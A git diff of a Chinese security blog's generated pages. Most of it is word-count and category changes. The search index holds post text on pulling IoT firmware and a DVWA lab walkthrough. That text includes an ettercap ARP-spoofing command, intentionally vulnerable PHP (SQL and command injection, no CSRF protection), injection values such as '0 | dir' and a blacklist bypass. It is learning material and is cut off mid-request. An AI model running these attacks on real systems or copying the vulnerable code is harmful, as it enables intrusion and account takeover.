class="nav-text">medium模式</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#SQL盲注"><span class="nav-text">SQL盲注</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#弱session-id"><span class="nav-text">弱session-id</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#easy模式-6"><span class="nav-text">easy模式</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#medium模式-6"><span class="nav-text">medium模式</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#基于DOM的XSS"><span class="nav-text">基于DOM的XSS</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#easy模式-7"><span class="nav-text">easy模式</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#medium模式-7"><span class="nav-text">medium模式</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#medium模式-8"><span class="nav-text">medium模式</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#存储型xss"><span class="nav-text">存储型xss</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#easy模式-8"><span class="nav-text">easy模式</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#medium模式-9"><span class="nav-text">medium模式</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#绕过安全策略"><span class="nav-text">绕过安全策略</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#easy模式-9"><span class="nav-text">easy模式</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#medium模式-10"><span class="nav-text">medium模式</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#JavaScript-Attacks"><span class="nav-text">JavaScript Attacks</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#easy模式-10"><span class="nav-text">easy模式</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#medium模式-11"><span class="nav-text">medium模式</span></a></li></ol></li></ol></div>
             
 
           </div>
@@ -844,7 +830,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/2019/07/24/获取固件/index.html b/2019/07/24/获取固件/index.html
index 0e84c484..b9a0b080 100644
--- a/2019/07/24/获取固件/index.html
+++ b/2019/07/24/获取固件/index.html
@@ -88,7 +88,7 @@
 <meta property="og:description" content="通过分析物联网设备遭受攻击的链条可以发现，黑客获取固件，把固件逆向成汇编或C程序语言后，能分析出设备的运行流程和网络行为，还能找到安全加密相关的密钥相关的信息。如果这些“有心人”没能获取到固件信息，他们也很难发现这些漏洞。从这一点看，物联网设备的安全性，在很大程度上决定于其固件的安全性。 http://blog.nsfocus.net/security-analysis-of-the-firmwa">
 <meta property="og:locale" content="zh-Hans">
 <meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1563606353/samples/1.png">
-<meta property="og:updated_time" content="2019-07-24T03:50:46.543Z">
+<meta property="og:updated_time" content="2019-07-24T06:01:00.825Z">
 <meta name="twitter:card" content="summary">
 <meta name="twitter:title" content="获取固件的几种方法">
 <meta name="twitter:description" content="通过分析物联网设备遭受攻击的链条可以发现，黑客获取固件，把固件逆向成汇编或C程序语言后，能分析出设备的运行流程和网络行为，还能找到安全加密相关的密钥相关的信息。如果这些“有心人”没能获取到固件信息，他们也很难发现这些漏洞。从这一点看，物联网设备的安全性，在很大程度上决定于其固件的安全性。 http://blog.nsfocus.net/security-analysis-of-the-firmwa">
@@ -359,8 +359,8 @@
               
               
                 <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
-                  <a href="/categories/IoT/" itemprop="url" rel="index">
-                    <span itemprop="name">IoT</span>
+                  <a href="/categories/IOT/" itemprop="url" rel="index">
+                    <span itemprop="name">IOT</span>
                   </a>
                 </span>
 
@@ -709,7 +709,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/about/index.html b/about/index.html
index 6df4d466..05f91dca 100644
--- a/about/index.html
+++ b/about/index.html
@@ -460,7 +460,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/archives/2000/01/index.html b/archives/2000/01/index.html
index 2b936e34..0b65d1c9 100644
--- a/archives/2000/01/index.html
+++ b/archives/2000/01/index.html
@@ -493,7 +493,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/archives/2000/index.html b/archives/2000/index.html
index 7518b11c..ee53952b 100644
--- a/archives/2000/index.html
+++ b/archives/2000/index.html
@@ -493,7 +493,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/archives/2018/11/index.html b/archives/2018/11/index.html
index a848c432..3da6ea9b 100644
--- a/archives/2018/11/index.html
+++ b/archives/2018/11/index.html
@@ -493,7 +493,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/archives/2018/12/index.html b/archives/2018/12/index.html
index 32c3152b..8c1e999c 100644
--- a/archives/2018/12/index.html
+++ b/archives/2018/12/index.html
@@ -563,7 +563,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/archives/2018/index.html b/archives/2018/index.html
index 8a05c9ba..1917e117 100644
--- a/archives/2018/index.html
+++ b/archives/2018/index.html
@@ -598,7 +598,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/archives/2019/01/index.html b/archives/2019/01/index.html
index 5a31d7f7..41df3db9 100644
--- a/archives/2019/01/index.html
+++ b/archives/2019/01/index.html
@@ -493,7 +493,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/archives/2019/02/index.html b/archives/2019/02/index.html
index bd432f3c..33e540a3 100644
--- a/archives/2019/02/index.html
+++ b/archives/2019/02/index.html
@@ -493,7 +493,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/archives/2019/03/index.html b/archives/2019/03/index.html
index c610ed7a..0d1ead74 100644
--- a/archives/2019/03/index.html
+++ b/archives/2019/03/index.html
@@ -598,7 +598,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/archives/2019/04/index.html b/archives/2019/04/index.html
index 69173757..41c408da 100644
--- a/archives/2019/04/index.html
+++ b/archives/2019/04/index.html
@@ -528,7 +528,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/archives/2019/05/index.html b/archives/2019/05/index.html
index 45ffc335..005a5918 100644
--- a/archives/2019/05/index.html
+++ b/archives/2019/05/index.html
@@ -528,7 +528,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/archives/2019/07/index.html b/archives/2019/07/index.html
index ce94a716..f175a53b 100644
--- a/archives/2019/07/index.html
+++ b/archives/2019/07/index.html
@@ -668,7 +668,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/archives/2019/index.html b/archives/2019/index.html
index 7cbcac67..5adc4cf4 100644
--- a/archives/2019/index.html
+++ b/archives/2019/index.html
@@ -812,7 +812,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/archives/2019/page/2/index.html b/archives/2019/page/2/index.html
index b4623ea4..c1a67a4f 100644
--- a/archives/2019/page/2/index.html
+++ b/archives/2019/page/2/index.html
@@ -672,7 +672,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/archives/index.html b/archives/index.html
index 0956f70f..b6fa8613 100644
--- a/archives/index.html
+++ b/archives/index.html
@@ -812,7 +812,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/archives/page/2/index.html b/archives/page/2/index.html
index 83f1aa0b..879c2195 100644
--- a/archives/page/2/index.html
+++ b/archives/page/2/index.html
@@ -817,7 +817,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/archives/page/3/index.html b/archives/page/3/index.html
index c524714f..4971d009 100644
--- a/archives/page/3/index.html
+++ b/archives/page/3/index.html
@@ -497,7 +497,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/bookmarks/index.html b/bookmarks/index.html
index 343285ed..8d6ff419 100644
--- a/bookmarks/index.html
+++ b/bookmarks/index.html
@@ -512,7 +512,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/categories/IOT/index.html b/categories/IOT/index.html
index de3d2d77..111cbba6 100644
--- a/categories/IOT/index.html
+++ b/categories/IOT/index.html
@@ -303,6 +303,32 @@
       
         
 
+  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
+    <header class="post-header">
+
+      <h2 class="post-title">
+        
+            <a class="post-title-link" href="/2019/07/24/获取固件/" itemprop="url">
+              
+                <span itemprop="name">获取固件的几种方法</span>
+              
+            </a>
+        
+      </h2>
+
+      <div class="post-meta">
+        <time class="post-time" itemprop="dateCreated" datetime="2019-07-24T11:49:28+08:00" content="2019-07-24">
+          07-24
+        </time>
+      </div>
+
+    </header>
+  </article>
+
+
+      
+        
+
   <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
     <header class="post-header">
 
@@ -552,7 +578,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/categories/Pwn二进制漏洞/index.html b/categories/Pwn二进制漏洞/index.html
index 73097bd4..b207dde3 100644
--- a/categories/Pwn二进制漏洞/index.html
+++ b/categories/Pwn二进制漏洞/index.html
@@ -500,7 +500,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/categories/index.html b/categories/index.html
index caaa80e7..24307690 100644
--- a/categories/index.html
+++ b/categories/index.html
@@ -314,7 +314,7 @@
                 目前共计 9 个分类
             </div>
             <div class="category-all">
-              <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/IOT/">IOT</a><span class="category-list-count">4</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/IoT/">IoT</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Pwn二进制漏洞/">Pwn二进制漏洞</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/web/">web</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/二进制/">二进制</a><span class="category-list-count">5</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/加密解密/">加密解密</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/杂七杂八/">杂七杂八</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/理论学习/">理论学习</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/顶会论文/">顶会论文</a><span class="category-list-count">3</span></li></ul>
+              <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/IOT/">IOT</a><span class="category-list-count">5</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Pwn二进制漏洞/">Pwn二进制漏洞</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/web/">web</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/二进制/">二进制</a><span class="category-list-count">5</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/加密解密/">加密解密</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/杂七杂八/">杂七杂八</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/理论学习/">理论学习</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/顶会论文/">顶会论文</a><span class="category-list-count">3</span></li></ul>
             </div>
           </div>
         
@@ -465,7 +465,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/categories/web/index.html b/categories/web/index.html
index 2ee16ffd..701afe92 100644
--- a/categories/web/index.html
+++ b/categories/web/index.html
@@ -474,7 +474,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/categories/二进制/index.html b/categories/二进制/index.html
index f5739541..0945c7f6 100644
--- a/categories/二进制/index.html
+++ b/categories/二进制/index.html
@@ -578,7 +578,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/categories/加密解密/index.html b/categories/加密解密/index.html
index 24b39d57..457dd741 100644
--- a/categories/加密解密/index.html
+++ b/categories/加密解密/index.html
@@ -474,7 +474,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/categories/杂七杂八/index.html b/categories/杂七杂八/index.html
index 3299f7cb..2898f808 100644
--- a/categories/杂七杂八/index.html
+++ b/categories/杂七杂八/index.html
@@ -474,7 +474,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/categories/理论学习/index.html b/categories/理论学习/index.html
index 438780c5..298c3fa9 100644
--- a/categories/理论学习/index.html
+++ b/categories/理论学习/index.html
@@ -474,7 +474,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/categories/顶会论文/index.html b/categories/顶会论文/index.html
index e3da168b..5cbc48c7 100644
--- a/categories/顶会论文/index.html
+++ b/categories/顶会论文/index.html
@@ -526,7 +526,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/index.html b/index.html
index 89aec5d4..c21603d1 100644
--- a/index.html
+++ b/index.html
@@ -358,8 +358,8 @@
               
               
                 <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
-                  <a href="/categories/IoT/" itemprop="url" rel="index">
-                    <span itemprop="name">IoT</span>
+                  <a href="/categories/IOT/" itemprop="url" rel="index">
+                    <span itemprop="name">IOT</span>
                   </a>
                 </span>
 
@@ -2297,7 +2297,7 @@ MotivationDBMS(数据库管理系统)
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/page/2/index.html b/page/2/index.html
index 787f2902..1c4a779a 100644
--- a/page/2/index.html
+++ b/page/2/index.html
@@ -2351,7 +2351,7 @@ ettercap嗅探智能设备和网关之间的流量sudo ettercap -i ens33 -T -q
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/page/3/index.html b/page/3/index.html
index 6db08008..3332660c 100644
--- a/page/3/index.html
+++ b/page/3/index.html
@@ -601,7 +601,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/search.xml b/search.xml
index 619a5934..ba6683da 100644
--- a/search.xml
+++ b/search.xml
@@ -5,7 +5,7 @@
     <url>%2F2019%2F07%2F24%2F%E8%8E%B7%E5%8F%96%E5%9B%BA%E4%BB%B6%2F</url>
     <content type="text"><![CDATA[通过分析物联网设备遭受攻击的链条可以发现，黑客获取固件，把固件逆向成汇编或C程序语言后，能分析出设备的运行流程和网络行为，还能找到安全加密相关的密钥相关的信息。如果这些“有心人”没能获取到固件信息，他们也很难发现这些漏洞。从这一点看，物联网设备的安全性，在很大程度上决定于其固件的安全性。 http://blog.nsfocus.net/security-analysis-of-the-firmware-of-iot/https://open.appscan.io/article-1163.html 官网获取或联系售后索取升级包网络升级拦截工具：wireshark、ettercap流程：中间人-&gt;开始抓包-&gt;在线升级-&gt;分析固件地址-&gt;下载案例：华为路由WS5200 四核版这款路由器在网上找不到现有固件，我们尝试一下是否可以通过抓包在线升级过程获取固件。首先关闭防火墙，否则无法访问路由器的服务，无法做中间人攻击。使用ettercap进行arp欺骗，sudo ettercap -Tq -i ens33 -M arp:remote /192.168.31.1// /192.168.31.134//打开wireshark进行抓包。理论上说，点击升级固件之后，wireshark就能够记录升级固件的整个过程(HTTP),但是结果却并不理想。 还好华为路由器自带了抓包的功能（方便后期的调试和维护），所以直接使用这个功能抓取报文，比做中间人要直接了当得多。 在点击升级固件之后，我们可以看到大量发往58.49.156.104这个地址的报文，猜测极有可能是华为的服务器，过滤一下会看得更清楚可以看到在通过三次TCP握手之后，华为路由器向服务器发送了get请求，uri就是获取固件的地址 http://update.hicloud.com/TDS/data/files/p14/s145/G4404/g1810/v272964/f1/WS5200_10.0.2.7_main.bin点击即可拿到最新的固件 案例：小米智能门锁http://cdn.cnbj0.fds.api.mi-img.com/miio_fw/250cc495d7da7643680dadeab578fce0_upd_lumi.lock.mcn01.bin?GalaxyAccessKeyId=5721718224520&amp;Expires=1566136387000&amp;Signature=KLOrbsRANlJD7w7bKB03xI1t4/0= ./storage/emulated/0/Android/data/com.xiaomi.smarthome/cache/ble/250cc495d7da7643680dadeab578fce0_upd_lumi.lock.mcn01.bin 123456$ binwalk -Me 250cc495d7da7643680dadeab578fce0_upd_lumi.lock.mcn01.binScan Time: 2019-07-20 20:01:40Target File: /home/han/ck/iot/250cc495d7da7643680dadeab578fce0_upd_lumi.lock.mcn01.binMD5 Checksum: 250cc495d7da7643680dadeab578fce0Signatures: 390 通过串口读取工具：uart转usb流程：找到电路板上的uart接口（RX、TX、+5v、GND）-&gt;串口通信-&gt;拿到shell-&gt;tar打包固件-&gt;nc传输案例：小爱音响 刷开发板固件，开启ssh服务有些厂商除了稳定版固件，还会提供开发版供发烧友“玩弄”。案例：小米路由器的开发板可通过安装ssh工具包开启ssh服务流程：开启ssh-&gt;tar打包固件12345678910111213141516171819202122232425262728root@XiaoQiang:/# lsbin data dev etc extdisks lib mnt opt overlay proc readonly rom root sbin sys tmp userdisk usr var www压缩提示没有足够的空间root@XiaoQiang:/# tar -zcf bin.tar.gz bin/*tar: can&apos;t open &apos;bin.tar.gz&apos;: No space left on device来看一下空间使用情况root@XiaoQiang:/# df -hFilesystem Size Used Available Use% Mounted onrootfs 25.9M 25.9M 0 100% /none 60.5M 4.5M 56.0M 7% /devtmpfs 60.9M 1.5M 59.4M 2% /tmpubi0_0 25.9M 25.9M 0 100% /tmpfs 60.9M 1.5M 59.4M 2% /tmptmpfs 60.9M 1.5M 59.4M 2% /extdisksubi1_0 45.4M 6.7M 36.3M 16% /dataubi1_0 45.4M 6.7M 36.3M 16% /userdiskubi0_0 25.9M 25.9M 0 100% /userdisk/dataubi1_0 45.4M 6.7M 36.3M 16% /etc/dev目录下还有足够空间，继续压缩root@XiaoQiang:/# tar -zcf ./dev/bin.tar.gz bin/*root@XiaoQiang:/# tar -zcf ./dev/data.tar.gz data/*其他的目录也是一样的方法scp传输到本地scp root:password@miwifi:/dev/*.tar.gz ./Desktop uboot提取固件案例：2018年看雪提供的摄像头 通过调试接口JTAG/SWD拆存储（flash、SD卡、硬盘等），用编程器或读卡器获取逻辑分析仪]]></content>
       <categories>
-        <category>IoT</category>
+        <category>IOT</category>
       </categories>
       <tags>
         <tag>IoT</tag>
@@ -15,7 +15,7 @@
   <entry>
     <title><![CDATA[DVWA黑客攻防平台]]></title>
     <url>%2F2019%2F07%2F24%2Fweb-dvwa%2F</url>
-    <content type="text"><![CDATA[搭建环境最好使用docker来搭建，方便迁移 https://hub.docker.com/r/vulnerables/web-dvwa/ 暴力破解easy模式 密码破解是从存储在计算机系统中或由计算机系统传输的数据中恢复密码的过程。一种常见的方法是反复尝试密码的猜测。用户经常选择弱密码。不安全选择的例子包括在词典中找到的单个单词，姓氏，任何太短的密码（通常被认为少于6或7个字符），或可预测的模式（例如交替的元音和辅音，这被称为leetspeak，所以“密码“变成”p @ 55w0rd“）。创建针对目标生成的目标单词列表通常会提供最高的成功率。有一些公共工具可以根据公司网站，个人社交网络和其他常见信息（如生日或毕业年份）的组合创建字典。最后一种方法是尝试所有可能的密码，称为暴力攻击。从理论上讲，如果尝试次数没有限制，那么暴力攻击将永远是成功的，因为可接受密码的规则必须是公开的;但随着密码长度的增加，可能的密码数量也越来越长。 使用burpsuite可破之，Burp suite运行后，Proxy 开起默认的8080 端口作为本地代理接口。使用Burp suite通过置一个web 浏览器使用其代理服务器123456789101112131415161718192021222324252627282930313233&lt;?phpif( isset( $_GET[ 'Login' ] ) ) &#123; // Get username $user = $_GET[ 'username' ]; // Get password $pass = $_GET[ 'password' ]; $pass = md5( $pass ); // Check the database $query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '&lt;pre&gt;' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '&lt;/pre&gt;' ); if( $result &amp;&amp; mysqli_num_rows( $result ) == 1 ) &#123; // Get users details $row = mysqli_fetch_assoc( $result ); $avatar = $row["avatar"]; // Login successful echo "&lt;p&gt;Welcome to the password protected area &#123;$user&#125;&lt;/p&gt;"; echo "&lt;img src=\"&#123;$avatar&#125;\" /&gt;"; &#125; else &#123; // Login failed echo "&lt;pre&gt;&lt;br /&gt;Username and/or password incorrect.&lt;/pre&gt;"; &#125; ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);&#125;?&gt; PHP $_GET 变量在 PHP 中，预定义的 $_GET 变量用于收集来自 method=”get” 的表单中的值。 $_GET 变量预定义的 $_GET 变量用于收集来自 method=”get” 的表单中的值。从带有 GET 方法的表单发送的信息，对任何人都是可见的（会显示在浏览器的地址栏），并且对发送信息的量也有限制。 何时使用 method=”get”？在 HTML 表单中使用 method=”get” 时，所有的变量名和值都会显示在 URL 中。所以在发送密码或其他敏感信息时，不应该使用这个方法！然而，正因为变量显示在 URL 中，因此可以在收藏夹中收藏该页面。在某些情况下，这是很有用的。HTTP GET 方法不适合大型的变量值。它的值是不能超过 2000 个字符的。 12345678910GET /vulnerabilities/brute/?username=admin123&amp;password=123&amp;Login=Login HTTP/1.1Host: 192.168.31.84:81Proxy-Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Referer: http://192.168.31.84:81/vulnerabilities/brute/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8Cookie: PHPSESSID=rbb91verhfhas5a6k7tq77bmo4; security=low 我们可以看到username和password是以明文出现，可以修改。 将请求进行提交到intruder模块，在那里可以把password设置为我们破解的payload.点击Start attack~然后就根据对面返回包的大小，知道密码，’password’返回的长度更长 medium模式代码与前面相比只是多了要用mysqli_real_escape_string函数进行验证，以及登录失败会 sleep(2)。将用户名和密码转义，比如说 \n 被转义成 \n，’ 转义成 \’，这可以抵御一些 SQL 注入攻击，但是不能抵御爆破。 命令执行easy模式 命令注入攻击的目的是在易受攻击的应用程序中注入和执行攻击者指定的命令。在这种情况下，执行不需要的系统命令的应用程序就像一个伪系统shell，攻击者可以将它用作任何授权的系统用户。但是，命令的执行具有与Web服务相同的权限和环境。 在大多数情况下，命令注入攻击是可能的，因为缺少正确的输入数据验证，攻击者可以操纵它（表单，cookie，HTTP头等）。 操作系统（OS）（例如Linux和Windows）的语法和命令可能不同，具体取决于所需的操作。 此攻击也可称为“远程命令执行（RCE）”。 123456789101112131415161718192021&lt;?phpif( isset( $_POST[ 'Submit' ] ) ) &#123; // Get input $target = $_REQUEST[ 'ip' ]; // Determine OS and execute the ping command. if( stristr( php_uname( 's' ), 'Windows NT' ) ) &#123; // Windows $cmd = shell_exec( 'ping ' . $target ); &#125; else &#123; // *nix $cmd = shell_exec( 'ping -c 4 ' . $target ); &#125; // Feedback for the end user echo "&lt;pre&gt;&#123;$cmd&#125;&lt;/pre&gt;";&#125;?&gt; 可见，服务器无条件执行了ping $target的命令，如果注入$target = 0 | dir，服务器就会执行dir 管道符号，是unix一个很强大的功能,符号为一条竖线:”|”。用法: command 1 | command 2 他的功能是把第一个命令command 1执行的结果作为command 2的输入传给command 2 任意命令执行漏洞修补办法在写程序时尽量地使变量不能被用户所控制！且注意变量初始化的问题。 使用str_replace对“%”，”|”,“&gt;”进行替换 进入函数前判断变量是否合法。 medium模式无非就是增加了一个黑名单 &amp;&amp;和；，但还是可以用管道|和&amp;12345// Set blacklist$substitutions = array( &apos;&amp;&amp;&apos; =&gt; &apos;&apos;, &apos;;&apos; =&gt; &apos;&apos;,); 这里需要注意的是”&amp;&amp;”与”&amp;”的区别：Command 1&amp;&amp;Command 2先执行Command 1，执行成功后执行Command 2，否则不执行Command 2Command 1&amp;Command 2先执行Command 1，不管是否成功，都会执行Command 2 更聪明的做法是利用&amp;;&amp;，黑名单会将其转化为&amp;&amp; CSRFeasy模式 CSRF跨站请求伪造是一种攻击，它强制终端用户在当前对其进行身份验证的Web应用程序上执行不需要的操作。在社交工程的帮助下（例如通过电子邮件/聊天发送链接），攻击者可能会强制Web应用程序的用户执行攻击者选择的操作。成功的CSRF利用可能会损害最终用户数据和普通用户的操作。如果目标最终用户是管理员帐户，则可能会危及整个Web应用程序。此攻击也可称为“XSRF”，类似于“跨站点脚本（XSS）”，它们通常一起使用。您的任务是让当前用户使用CSRF攻击更改自己的密码，而无需他们了解自己的操作。 1234567891011121314151617181920212223242526272829&lt;?phpif( isset( $_GET[ 'Change' ] ) ) &#123; // Get input $pass_new = $_GET[ 'password_new' ]; $pass_conf = $_GET[ 'password_conf' ]; // Do the passwords match? if( $pass_new == $pass_conf ) &#123; // They do! $pass_new = ((isset($GLOBALS["___mysqli_ston"]) &amp;&amp; is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); $pass_new = md5( $pass_new ); // Update the database $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '&lt;pre&gt;' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '&lt;/pre&gt;' ); // Feedback for the user echo "&lt;pre&gt;Password Changed.&lt;/pre&gt;"; &#125; else &#123; // Issue with passwords matching echo "&lt;pre&gt;Passwords did not match.&lt;/pre&gt;"; &#125; ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);&#125;?&gt; 服务器通过GET方式接收修改密码的请求，会检查参数password_new与password_conf是否相同，如果相同，就会修改密码，没有任何的防CSRF机制（当然服务器对请求的发送者是做了身份验证的，是检查的cookie，只是这里的代码没有体现）。 12345678910GET /vulnerabilities/csrf/?password_new=123&amp;password_conf=123456&amp;Change=Change HTTP/1.1Host: 192.168.31.84:81Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36Accept: 